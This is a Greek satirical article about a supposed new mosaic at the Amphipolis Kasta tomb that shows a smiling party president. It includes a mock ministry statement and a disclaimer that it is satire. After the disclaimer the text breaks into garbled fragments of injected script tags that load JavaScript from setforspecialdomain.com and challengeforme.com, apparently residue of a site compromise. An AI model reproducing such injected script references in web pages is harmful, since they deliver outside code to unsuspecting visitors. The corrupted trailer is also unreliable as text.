Παγκόσμιο ΣΟΚ! Βρέθηκε νέο ψηφιδωτό στην Αμφίπολη!

1

Νέο ακόμα πιο εντυπωσιακό ψηφιδωτό δάπεδο κατασκευασμένο από μικρά βότσαλα που εικονίζει επίτιμο πρόεδρο γνωστού κόμματος που μειδιά, αποκαλύφθηκε κατά την συνέχιση των ανασκαφικών εργασιών στον λόφο Καστά Αμφίπολης, από την ΚΗ´ Εφορεία Προϊστορικών και Κλασικών Αρχαιοτήτων.

Γράφει η Βίκυ Κουλούρη

Η ανακοίνωση του υπουργείου Πολιτισμού:

«Κατά τη σταδιακή αφαίρεση μέρους της επίχωσης, από τον δεύτερο χώρο, πίσω από τις Καρυάτιδες και μέχρι την επιφάνεια του δαπέδου, σε βάθος 6μ. από την θόλο αποκαλύφθηκε το μεγαλύτερο τμήμα ψηφιδωτού δαπέδου, το οποίο καλύπτει όλη την επιφάνεια του χώρου δηλαδή, 4,5μ. πλάτος επί 3 μ. μήκος. Το πρόσωπο μας φάνηκε γνωστό και γίνεται διαδικασία αναγνώρισης από έμπειρους Αρχαιολόγους – πολιτικούς επιστήμονες. Εντύπωση μας κάνει το γεγονός ότι δίπλα από το πρόσωπο που εμφανίζεται είναι το μοναδικό σημείο του ψηφιδωτού που έχει υποστεί φθορά.

(Σημείωση: Το κείμενο αυτό και η φωτογραφία που το συνοδεύει, αποτελούν προϊόν επινόησης με στόχο τη σάτιρα και σε καμία περίπτωση δεν ανταποκρίνονται στην πραγματικότητα. Καταναλώστε τα υπεύθυνα)___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >